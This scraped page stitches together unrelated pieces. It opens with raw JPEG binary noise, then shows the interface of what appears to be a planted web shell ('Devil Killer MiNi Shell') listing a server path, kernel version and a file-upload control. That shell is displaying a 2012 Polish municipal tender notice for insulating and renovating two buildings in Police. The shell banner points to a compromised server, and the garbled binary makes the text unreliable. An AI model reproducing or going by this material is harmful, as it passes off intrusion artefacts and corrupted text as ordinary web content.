JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120527/174320-N-2012.html

<p class="kh_header"><b>Police: Termomodernizacja budynków  
w Policach, przy ul. Konopnickiej 2  i Kościuszki 13</b><br>
<b>Numer ogłoszenia: 174320 - 2012; data zamieszczenia: 27.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Policach , ul. Stefana Batorego 3, 72-010 Police, woj. zachodniopomorskie, tel. 91 4311830, faks 91 4311832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.police.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków  
w Policach, przy ul. Konopnickiej 2  i Kościuszki 13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I. Termomodernizacja budynku użytkowego w Policach, ul. M. Konopnickiej 2:

a)	ocieplenie ścian zewnętrznych budynku, kolorystyka elewacji budynku, wymiana stolarki okiennej i drzwiowej wraz z robotami budowlanymi towarzyszącym. 

Zakres robót:

1. Ocieplenie ścian zewnętrznych budynku, kolorystyka elewacji budynku, wymiana stolarki okiennej i drzwiowej wraz z robotami budowlanymi towarzyszącymi:

-	Wykonanie daszków zabezpieczających nad wejściami do budynku, wykonanie ogrodzenia placu budowy, 
-	ustawienie rusztowania ramowego z osłonami z siatki - wysokości do 10 m, wraz z wykonaniem instalacji odgromowej,
-	wymiana stolarki okiennej zgodnie z projektem budowlanym:
-	wykucie starych okien drewnianych, wraz z obróbkami z blachy,
-	montaż nowych okien z pcv białych o wyglądzie i podziale zgodnym z zatwierdzonym projektem, z uzupełnieniem tynków ościeży,
-	wymiana stolarki drzwiowej:
-	wykucie starych drzwi metalowych (2 szt drzwi techniczne) i wstawienie nowych metalowych drzwi pełnych ocieplanych, z uzupełnieniem tynków ościeży,
-	odnowienie - lakierowanie drzwi wejściowych do budynku od strony ulicy,
-	Detale architektoniczne - elewacja frontowa:
Istniejące detale architektoniczne na elewacji frontowej zgodnie z wytycznymi konserwatorskimi należy poddać renowacji. Elewację oczyścić za pomocą myjki ciśnieniowej, z partii tynkowanych i detali architektonicznych usunąć spękane i odparzone fragmenty tynku, uzupełnić ubytki przy pomocy specjalistycznej zaprawy o fakturze dobranej do faktury istniejących partii tynku i detalu (średnie uziarnienie piasku), a następnie malować zgodnie z projektem kolorystyki.
-	ocieplenie ścian zewnętrznych powyżej cokołu (bez ocieplenia elewacji frontowej):
-	zabezpieczenie folią okien i drzwi,
-	przygotowanie ścian zewnętrznych budynków pod docieplenie (naprawa tynków, uzupełnienie tynków, odbicie uszkodzonych tynków, wykucie wszystkich zakotwionych w elewacji elementów), skucie gzymsu i występów, założenie klamer na pęknięcia ścian, 
-	oczyszczenie istniejącej elewacji i zmycie,  wykonanie impregnacji grzybobójczej,
-	dwukrotne zagruntowanie ścian przed dociepleniem, nałożenie podkładowej masy tynkarskiej,
-	wyrobienie spadków podokiennych pod parapety zewnętrzne,
-	zamocowanie listwy startowej - cokołowej,
-	przyklejenie płyt styropianowych grubości 15 cm na ścianach, grubości 3 cm na ościeżach, z zastosowaniem kleju i dybli plastikowych,
-	przyklejenie warstwy siatki na całości (na ścianach i ościeżach), a ponadto dodatkowej warstwy siatki na wysokości parteru i na ościeżach okiennych, 
-	przyklejenie kątowników aluminiowych na narożnikach wypukłych,
-	wykonanie parapetów zewnętrznych i obróbek blacharskich ogniomurów z blachy powlekanej wg kolorystyki opisanej w zał. nr 11a do SIWZ,
-	wykonanie wyprawy elewacyjnej z tynku mineralnego gr. 2 mm na ścianach i ościeżach,
-	malowanie wykonanego tynku farbą silikonową wg kolorystyki przedstawionej na rysunku wg załącznika 11a do SIWZ,
-	malowanie olejne podbitek drewnianych, 
-	malowanie olejne krat okiennych, 
-	wykonanie napisu adresowego: M. KONOPNICKIEJ 2 - litery wys. 30 cm,
-	roboty izolacyjne:
-	rozebranie opaski betonowej wzdłuż ścian budynku i stopni betonowych,
-	wykonanie wykopów wzdłuż ścian budynków w celu odsłonięcia ścian poniżej terenu na głębokość do 1,0 m,
-	oczyszczenie ścian poniżej terenu, zmycie, usunięcie starej zaprawy, naprawienie murów, 
-	wykonanie izolacji pionowej murów, ocieplenie płytami styropianowymi wodoodpornymi (styrodur) grubości 10 cm z zastosowaniem dybli plastikowych, zabezpieczenie siatką dolnej krawędzi płyt styropianowych przed odwarstwieniem od ściany fundamentowej, przyklejenie warstwy siatki na przygotowanym ociepleniu, zaizolowanie preparatami wg opisu w projekcie lub folią PE, zasypanie wykopów, 
-	remont cokołu:
-	skucie na cokole poszerzenia ceglanego poza lico ściany,
-	obłożenie płytkami klinkierowymi na zaprawie klejowej cokołu i ościeży drzwiowych po uprzednim przygotowaniu powierzchni, naprawie tynków i ociepleniu płytami styropianowymi grubości 12 cm i zabezpieczeniu siatką, 
-	naprawa opaski, podestu i schodów wejściowych: 
-	wykonanie opaski betonowej wzdłuż ścian budynku, zagruntowanie powierzchni betonowej podestu, wyrównanie powierzchni, wykonanie okładziny z płytek kamionkowych gresowych mrozoodpornych antypoślizgowych na zaprawie klejowej,  
-	rury spustowe:
-	demontaż, a po wykonaniu docieplenia  ścian, montaż rur spustowych (z materiału z rozbiórki) z uzupełnieniem brakujących kolanek,  
-	roboty pozostałe:
-	zakup i osadzenie bram stalowych dwuskrzydłowych,
-	wymiana szafki gazowej i szafki energetycznej,
-	naprawa daszku wystającej ścianki od strony zaplecza - pokrycie papą asfaltową,
-	montaż kratek wentylacyjnych w elewacji,
-	zamontowanie drobnych nowych elementów: uchwytu do flag, tabliczki adresowej                         z numerem budynku, opraw oświetleniowych nad drzwiami wejściowymi,
	wywiezienie i utylizacja materiałów z rozbiórki  .



     Zadanie II. Termomodernizacja budynku, wymiana instalacji elektrycznej i remont klatki schodowej w Policach, ul. T. Kościuszki 13

a)	ocieplenie ścian zewnętrznych budynku, kolorystyka elewacji budynku, wymiana stolarki okiennej i drzwiowej wraz z robotami budowlanymi towarzyszącymi,
b)	wymiana instalacji elektrycznej w częściach wspólnych budynku,
c)	remont klatki schodowej, wejścia, konstrukcji zewnętrznych.

Zakres robót :

1. Ocieplenie ścian zewnętrznych budynku, kolorystyka elewacji budynku, wymiana stolarki okiennej i drzwiowej wraz z robotami budowlanymi towarzyszącymi:

-	Wykonanie daszków zabezpieczających nad wejściami do budynku, wykonanie ogrodzenia placu budowy, 
-	ustawienie rusztowania ramowego z osłonami z siatki - wysokości do 16 m, wraz z wykonaniem instalacji odgromowej,
-	zabezpieczenie folią okien,
-	ściana frontowa (o wystroju secesyjnym):
Istniejące detale architektoniczne na elewacji frontowej zgodnie z wytycznymi konserwatorskimi należy poddać renowacji. Elewacje oczyścić za pomocą myjki ciśnieniowej, z partii tynkowanych i detali architektonicznych usunąć spękane i odparzone fragmenty tynku, uzupełnić ubytki przy pomocy specjalistycznej zaprawy o fakturze dobranej do faktury istniejących partii tynku i detalu (średnie uziarnienie piasku), a następnie pomalować zgodnie z projektem kolorystyki. Partie ceglane elewacji należy oczyścić myjką ciśnieniową, wybrać zwietrzałe fugi i fragmenty cegły licowej, następnie należy uzupełnić ubytki cegieł za pomocą materiału zbliżonego kolorystycznie do oryginału lub przy użyciu specjalistycznych preparatów na bazie mączki ceglanej. Ubytki fug uzupełnić specjalistyczną zaprawą w kolorze dobranym do koloru oryginalnego fug,
-	pozostałe ściany:
-	przygotowanie ścian zewnętrznych budynków pod docieplenie (naprawa tynków, wykucie wszystkich zakotwionych w elewacji elementów),  
-	oczyszczenie istniejącej elewacji i zmycie,  
-	jednokrotne zagruntowanie ścian przed dociepleniem,
-	wyrobienie spadków podokiennych pod parapety zewnętrzne,
-	zamocowanie listwy startowej - cokołowej,
-	przyklejenie płyt styropianowych grubości 15 cm na ścianach, grubości 3 cm na ościeżach, z zastosowaniem kleju i dybli plastikowych,
-	przyklejenie warstwy siatki na całości (na ścianach i ościeżach), a ponadto dodatkowej warstwy siatki na wysokości parteru i na ościeżach okiennych, 
-	przyklejenie kątowników aluminiowych na narożnikach wypukłych,
-	wykonanie parapetów zewnętrznych z blachy powlekanej wg kolorystyki opisanej w zał. nr 11b do SIWZ,
-	montaż profili elewacyjnych - profile gzymsowe pomiędzy parterem a I piętrem), 
-	wykonanie wyprawy elewacyjnej z tynku mineralnego gr. 2 mm na ścianach i ościeżach,
-	malowanie wykonanego tynku farbą silikonową wg kolorystyki przedstawionej na rysunku wg załącznika 11b do SIWZ,
-	izolacja ścian fundamentowych:
-	rozebranie nawierzchni chodników i placów z betonowej kostki brukowej oraz opaski betonowej wzdłuż ścian budynków,
-	wykonanie wykopów wzdłuż ścian budynków w celu odsłonięcia ścian poniżej terenu na głębokość do 1,0 m,
-	oczyszczenie ścian poniżej terenu, zmycie, usunięcie starej zaprawy, naprawienie murów, 
-	wykonanie izolacji pionowej murów, ocieplenie płytami styropianowymi wodoodpornymi grubości 10 cm z zastosowaniem dybli plastikowych, zabezpieczenie siatką dolnej krawędzi płyt styropianowych przed odwarstwieniem od ściany fundamentowej, przyklejenie warstwy siatki na przygotowanym ociepleniu, zaizolowanie powłoką bitumiczną, zasypanie wykopów, 
-	odtworzenie chodników i placów z kostki betonowej polbruk i z betonu,
-	remont cokołu budynku:
-	obłożenie płytkami klinkierowymi na zaprawie klejowej cokołu i ościeży drzwi wejściowych po uprzednim przygotowaniu powierzchni, naprawie tynków i ociepleniu płytami styropianowymi grubości 10 cm i zabezpieczeniu siatką, 
-	naprawa schodów wejściowych:
-	rozebranie uszkodzonych schodów, uzupełnienie brakujących schodów, uszczelnienie powierzchni, wyrównanie powierzchni schodów i ścianek bocznych schodów, wykonanie okładziny z płytek kamionkowych gresowych mrozoodpornych antypoślizgowych na zaprawie klejowej, z zastosowaniem płytek stopnicowych i wykonaniem cokolików, obłożenie płytkami klinkierowymi ścian bocznych schodów, zamontowanie metalowej wycieraczki do obuwia, 
-	przełożenie rur spustowych, obróbki blacharskie: 
-	demontaż, a po dociepleniu montaż rur spustowych z rozbiórki, z uzupełnieniem nowych elementów - kolanek, stojaków, klap burzowych, 
-	wymiana obróbek blacharskich z blachy cynkowo-tytanowej: mur ogniowy i wiatrownice,
-	uzupełnienie pasa pokrycia dachowego wzdłuż obróbek, z papy termozgrzewalnej, 
-	wymiana stolarki drzwiowej:
-	wymiana drzwi wejściowych do klatki schodowej od strony zaplecza - drzwi drewniane, wraz z uzupełnieniem tynków na ościeży,
-	wymiana starych drzwi wejściowych do piwnicy na nowe drzwi stalowe pełne, z naprawą ościeży,
-	wymiana stolarki okiennej:
-	wymiana 16 szt starych okien drewnianych na nowe z pcv - z zachowaniem dzielności i wyglądu okien nawiązujących do okien historycznych, zgodnie z projektem architektonicznym, wraz z uzupełnieniem tynków ościeży,
-	pozostałe roboty:
-	wymiana podbitek drewnianych gzymsów z dwukrotnym malowaniem olejnym,
-	malowanie z przygotowaniem powierzchni szafki energetycznej,
-	zamontowanie drobnych nowych elementów: uchwytów do flag, tablic adresowych z numerem budynku, kratek wentylacyjnych, opraw oświetleniowych nad drzwiami wejściowymi,
-	wykonanie napisu adresowego na ścianie budynku,
-	zakup i zamontowanie nad drzwiami wejściowymi od strony zaplecza daszka wykonanego z profili aluminiowych z pokryciem z płyty poliwęglanowej,
-	wywiezienie materiałów z rozbiórki, utylizacja rozebranej papy bitumicznej,
-	opłata za zajęcie pasa drogowego  .

2.  Wymiana instalacji el. w częściach wspólnych:

-	wymiana WLZ,
-	wymiana tablic rozdzielczych i licznikowych,
-	wykonanie oświetlenia administracyjnego klatki schodowej na czujniki ruchu,
-	wykonanie oświetlenia korytarzy piwnicznych i strychu,
-	wykonanie niezbędnych przebić, bruzd, demontaży, naprawa tynków, 
-	wykonanie niezbędnych pomiarów elektrycznych, wykonanie schematu 1- kreskowego wraz z zatwierdzeniem w ZE  .

3.  Remont klatki schodowej, wejścia, konstrukcji zewnętrznych:

-	przygotowanie powierzchni sufitów i ścian przed malowaniem, 
-	naprawa - uzupełnienie brakujących tynków,
-	wzmocnienie sufitów na trzcinie - gruntowanie, przyklejenie siatki, wykonanie gładzi gipsowych na sufitach,
-	dwukrotne malowanie powierzchni gipsowych sufitów farbami emulsyjnymi,
-	wymiana 4 szt drzwi wewnętrznych wejściowych (wraz z ościeżnicą) w klatce schodowej,
-	uzupełnienie drewnianej tralki,
-	ochrona narożników wypukłych kątownikiem aluminiowym,
-	dwukrotne malowanie powierzchni ścian (powyżej lamperii) farbami emulsyjnymi,
-	dwukrotne malowanie powierzchni ścian (lamperii) farbami olejnymi,
-	zerwanie starej wykładziny z pcv na posadzce, naprawa posadzki cementowej, malowanie posadzki farbami olejnymi, 
-	malowanie olejne z uprzednim przygotowaniem powierzchni drewnianych: balustrady schodowej, policzków biegów schodowych, ścianek drewnianych, stopni i podstopni, 
-	olejne malowanie listew podłogowych i cokołów wzdłuż biegów schodowych, 
-	olejne malowanie rur wodnych i gazowych,
-	malowanie wapienne tynków korytarzy piwnicznych i ścian na strychu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.32.00.00-6, 45.43.10.00-7, 45.42.10.00-4, 45.42.10.00-4, 45.26.21.20-8, 45.11.12.20-6, 45.44.21.00-8, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość  wymaganego  wadium:

	Zadanie I		- Konopnickiej 2	-  2.300 zł  (dwa tysiące trzysta zł),
     	Zadanie II	- Kościuszki 13	-  3.600 zł  (trzy tysiące sześćset zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 1 do 	SIWZ p. 3 i 4:

3.	Wykaz zamówień wykonanych  w okresie ostatnich pięciu lat kalendarzowych (lub w okresie krótszym, jeżeli okres działalności był krótszy) polegających na kompleksowej termomodernizacji budynków, tj. dociepleniu ścian zewnętrznych budynków płytami styropianowymi wraz z wykonaniem kolorystyki elewacji i wymianą stolarki okiennej i drzwiowej, z uwzględnieniem towarzyszących robót budowlanych. Zamawiający wymaga, aby wykonawca udowodnił należyte wykonanie kompleksowej termomodernizacji  co najmniej 2 budynków o powierzchni ocieplanej min. 200 m2 i wartości robót minimum 100 000 zł brutto - wg zał. nr 7. 

4.	Dokumenty od poprzednich zamawiających (minimum od 2 różnych zamawiających) potwierdzające, że termomodernizacje budynków opisane w wykazie wg zał. nr 7 zostały wykonane lub są wykonywane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 1 do 	SIWZ p. 6 i 7 :


6. Wykaz i charakterystyka sprzętu, transportu, który będzie użyty do wykonania oferowanego zamówienia - wg zał. nr 8, ewentualnie zobowiązanie innego podmiotu do udostępnienia Wykonawcy wymaganego sprzętu, który uzyska od innego podmiotu. Zamawiający wymaga, aby Wykonawca dysponował rusztowaniami o pow. co najmniej 200 m2 . 
7. Określenie części zamówienia które wykonawca zamierza powierzyć (lub nie zamierza) podwykonawcom. Zamawiający wymaga, aby przynajmniej 70% zamówienia, tj. wykonanie elewacji budynku, wykonawca wykonał siłami własnymi - wg zał. nr 9.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 1 do 	SIWZ p. 5 :

5.  Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności kierującymi robotami  - wg zał. nr 8, z informacjami na temat ich kwalifikacji zawodowych, z załączeniem kserokopii odpowiednich uprawnień budowlanych i wpisu do właściwej Izby Inżynierów Budownictwa (lub oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia), wraz z informacją o podstawie do dysponowania tymi osobami. Zamawiający wymaga, aby wykonawca dysponował min. 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi, wpisaną do właściwej izby inżynierów budownictwa i posiadającą aktualne ubezpieczenie od odpowiedzialności cywilnej. Dodatkowo dla zadania II koniecznym jest dysponowanie osobą posiadającą właściwe uprawnienia energetyczne. Do oferty należy dołączyć stosowne oświadczenie osoby podejmującej się kierowania robotami,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 1 do 	SIWZ p. 8 i 9 :

8. Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (wymagana suma ubezpieczenia min. 100.000 zł).   
9. Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w wymaganej wysokości nie mniejszej niż 50% wartości  złożonej oferty wykonawcy brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

